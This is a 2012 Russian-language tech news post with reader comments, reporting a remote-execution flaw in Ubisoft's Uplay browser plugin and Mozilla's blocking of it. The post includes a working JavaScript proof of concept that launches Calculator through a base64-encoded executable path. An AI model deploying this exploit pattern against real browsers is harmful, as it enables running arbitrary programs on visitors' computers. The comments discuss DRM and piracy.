Пользователь
250,2
рейтинг
31 июля 2012 в 12:43

Разработка → Firefox заблокировал расширение Ubisoft Uplay

В программе Uplay от компании Ubisoft вчера была обнаружена серьёзная уязвимость, которая представляет собой бэкдор на компьютеры миллионов пользователей, установивших лицензионные игры от компании Ubisoft, такие как Assassin's Creed, Beowulf, Heroes of Might and Magic VI, Tom Clancy's Splinter Cell и прочие. Вместе с игрой на их компьютер установилась система Uplay DRM и расширение к браузеру.

Так вот, с помощью специального кода через это расширение можно получить доступ в систему пользователя с любого сайта.

Демо (в качестве примера запускает у вас на компьютере программу «Калькулятор»).

Код:
var x = document.createElement('OBJECT');
x.setAttribute("type", "application/x-uplaypc");
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode -uplay_dev_mode_auto_play")

Компания Ubisoft уверяет, что бэкдор не был специально встроен в систему, а это просто ошибка в коде. Они уже выпустили обновлённую версию Uplay, которую можно скачать с официального сайта.

Но программа не обновляется автоматически и она установлена на миллионах компьютеров, для очень многих риск безопасности сохраняется. Поэтому Mozilla сегодня приняла решение полностью заблокировать расширение Uplay для всех пользователей.
Анатолий Ализар @alizar
карма
739,5
рейтинг 250,2
Пользователь
Реклама помогает поддерживать и развивать наши сервисы

Подробнее
Реклама

Самое читаемое Разработка

Комментарии (43)

  • +11
    > Компания Ubisoft уверяет, что бэкдор не был специально встроен в систему, а это просто ошибка в коде.

    Это, как минимум, халатное отношение к пользовательской безопасности, а не ошибка в коде. Ошибкой назвать то, что из «безопасного» тут только кодирование путей к файлам осуществляется через base64? Жесть.
  • +25
    > Компания Ubisoft уверяет, что бэкдор не был специально встроен в систему, а это просто ошибка в коде.

    А из кода видно, что определенно специально.
    • +1
      Безусловно.
    • 0
      dev_mode = developer_mode?
  • +10
    Вот и польза от лицензионного софта
    • +14
      Вы хотели сказать «с закрытым кодом».
      • +6
        Если быть еще точнее, то от покупаемых лицензионных игр.
        • +2
          В пиратке оно спокойно могло бы быть, просто пиратки не осилили интеграцию с Uplay.
          Кстати пиратских полноценных версий тех же героев 6 нет по этой причине.
          • +1
            В каком смысле ПОЛНОЦЕННЫХ?
            • +1
              В прямом. Мечи-посохи(артефакты — оружие) в пиратках не работают.
              • +3
                orly? Как раз таки очень часто пиратки появляются с так называемым «премиум» контентом.
                • 0
                  И таких игр становится все больше, которые нельзя взломать по причине того, что часть контента присутствует только на серверах, а не на клиенте.
                  При этом у части игр на сервера переносят логику не из-за пиратства, а из-за ориентации игры на сеть. WoW, Diablo 3 и т.д.
                  А некоторые игры чисто сетевые, и в них не получится играть на пиратских серверах из-за обилия читеров либо пустых пиратских серверов: CS, Dungeon Defenders и прочие.
                  • 0
                    Простите но контент присутствует все таки в вашем клиенте. Мы ведь можем взять пример:
                    Battlefield 3 Расширенное издание. Сам клиент отличается от обычного издания, и качается только если в Origin вы активировали именно расширенное издание. Как я уже сказал, очень часто пиратские игры появляются именно «расширенными», то есть в них уже доступен для игроков тот контент который должен был быть только у обладателей пред заказа например.
                    Сравнивать синглплеер игры с WoW и Diablo 3 это полный бред. Все таки в ММО играх ВСЯ логика на серверах, а в тех же Героях лишь авторизация.
                    Даже чисто сетевые игры периодически взламываются и получается играть на пиратке.
                    З.Ы. DD не приплетайте, там вообще ArtMoney взламывается, разработчики вообще никакой защиты не вводили.
                    • 0
                      В героях не только авторизация, а еще и эвенты (особо порадовали микрофорумы в виде знаков), мечи всякие (как было сказано выше) и т.п.

                      В пиратке вы либо получите все мечи сразу = чит, ли бо не получите. микрофорума не будет.
                      • 0
                        Я честно только начинал играть и всех тонкостей не знаю. И честно не могу осознать фразу про «эвенты, микровофрумы, знаки» и тд.
                        Однако мечи активируются на стороне сервера, но доступны в вашем клиенте. Об этом я в самом начале и говорил.
                        Причем тут ваш «чит» когда я получаю премиум контент не знаю.
                        • –1
                          Ну так вы узнайте, потом уже постите…
                          • 0
                            Простите, а как не знание о каких то «эвентах»,«микрофорумах» и каких то «знаках», должно отражаться на моем видении вопроса «премиум контент в пиратской продукции»?
                            • 0
                              В виде того что в пиратке это работать не будет или будет работать не так, как задумано. Как следствие ухудшение качества и usability.
                              • 0
                                Этот спор начался со слов «НЕ ПОЛНОЦЕННАЯ ПИРАТКА», а закончилось фразой «УХУДШЕНИЕ USABILITY».
                                Вам не кажется что вы уже не о том? Пиратка есть пиратка, в 90% случаев в пиратке не работает multiplayer\coop. Это уже ухудшение юзабилити, да и вообще это можно сказать обрезает игру в половину. Потому как во многие игры гораздо играть именно по сети.
                                • 0
                                  Выделенное Вами, не противоречит друг другу.
                                  Пиратство SUXX и должно исчезнуть. Других вариантов быть не может, никакие сравнения не должны иметь место.
                                  • 0
                                    Как вы суровы, и однозначны.
                      • 0
                        > Простите но контент присутствует все таки в вашем клиенте.
                        В героях? Скорее всего да. Но в пиратках не работает.
                        • 0
                          Етить колотить. Вам показать раздачи игр на торрентах в которых премиум контент активирован и дсотупен сразу?
                          • 0
                            Мы же говорим про Uplay, и для примера я взял героев, работающих через Uplay.
                            • 0
                              Там вроде сверху сказали что те же самые мечи активированы в пиратке.
                            • 0
                              не туда ответил
            • +2
              предоставляющих бэкдор ))
      • 0
        насчёт закрытости возможно вы поторопились с выводами (к сожалению, не могу скачать тот самый проблемный юбисофтовый xpi)

        опыт работы с xpi (парочку я заточил под свои нужды) показывает, что это вполне опен-сорс (js в zip-архиве), если не применяется обфускация или native-код
  • +15
    Кстати, бесит.
    Купил в Steam игру, а там ещё вендорская DRM. Мало что ли им механизмов проверки подлинности, реализованных Valve? Нет, надо ещё говна накрутить. Гореть им в аду.
    • +3
      Ха, а я уже давно на эту хрень ругался. habrahabr.ru/post/137076/#comment_4574368
    • 0
      Зато там нету DRM от Steam(на примере героев 6): игра не слинкована со стимовскими либами и может быть запущена без стима.
      • 0
        А толку?
        • 0
          Можно играть в оффлайн режиме спокойно, но минусом будет отсутсвие возможностей династии.
          Т.е. в любом случае не будет хуже, чем в пиратке.

          А онлайн-режим даст и облако(за счет DRM), и общение(за счет DRM), и оружие династии(без возможности его читить за счет DRM).
          • 0
            Не не, мой комментарий был о взломе UBI защиты.
          • 0
            > Можно играть в оффлайн режиме спокойно

            Вроде бы сам Стим тоже поддерживает оффлайн режим, разве нет?
            • 0
              Ну так Ubisoft не пользуются стимовскими возможностями, это просто еще один канал продаж.

              Ну и в стиме с этим хуже: если внезапно пропадет инет, то будут сообщения «Эта игра не доступна в данный момент». В оффлайн-режим же надо переводить стим самостоятельно.
              • 0
                Понятно. Я играл только когда инета не было изначально, в середине он у меня не пропадал. Судя по вашим словам, это куда менее удобно, чем я ожидал.
                • 0
                  Если в середине пропадет на стиме — то ничего страшного.
                  Данное сообщение у меня появляется перед запуском.
  • +1
    Была тут год назад статья по поводу всякого рода бэкдоров в браузерных играх от одного из разработчиков оных. Недолго на Хабре была правда, удалили. Такого говна сейчас полно везде. Вчера ребенку хотел игру установить какую-то примитивную, но насторожился на лицензионном соглашении. Уж больно мелок шрифт был, да сплошной серой массой шел. Как вчитался, так сразу стало понятно, что по сути игрушка открывает доступ к важным разделам и функциям. Отменил установку и удалил.
  • +11
    на news.ycombinator комментарий неплохо характеризующий ситуацию:
    «Wow, well I already knew ubisoft were fisting me, but two hands? cmon.»
  • НЛО прилетело и опубликовало эту надпись здесь
    • 0
      У меня касперский заблокировал ссылку )
      • 0
        Аналогично. Хоть и установлен uplay, но Касперский среагировал и заблочил

Только зарегистрированные пользователи могут оставлять комментарии. Войдите, пожалуйста.